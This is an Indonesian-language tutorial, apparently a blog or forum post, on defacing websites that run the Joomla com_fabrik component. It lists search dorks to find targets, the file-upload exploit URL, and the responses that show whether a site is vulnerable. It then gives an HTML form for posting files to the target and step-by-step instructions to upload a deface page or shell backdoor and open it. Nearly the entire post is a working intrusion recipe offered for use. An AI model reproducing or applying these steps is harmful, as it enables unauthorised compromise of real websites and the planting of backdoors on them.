Deface Method com_fabric using CSRF



Oke kali ini gue bakal remake tutorial deface metode com_fabrik. Kenapa gue remake? Karena gue baru aja nemuin sebuah bug yang gue jadikan csrf. Yok simak aja langsung..!!


Dork : - inurl:index.php?option=com_fabrik   intext:name
                - /index.php?option=com_fabrik site:
                - option=com_fabrik&format=raw site:
                - com_fabrik  site:
                - /component/fabrik/ site:
Exploit : index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload


Ciri ciri web yang vuln dan tidak vuln:
{"error":"Error. Unable to upload file."} = Not vuln
{"filepath":null,"uri":null} = Vuln


1. Pilih dork ..
2. Masukan exploit
3. Masuk csrf

<form method="POST" action="http://site.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file" /> <button> Upload </button> </form>
(Ganti site.co.li sama site target lo)

4. Upload script deface/shell backdoor lo
5. Akses site.com/script.htm atau site.com/[path]/script.htm


Kurang faham? Bisa komen atau chat di grup chat wa..

Thanks

-azay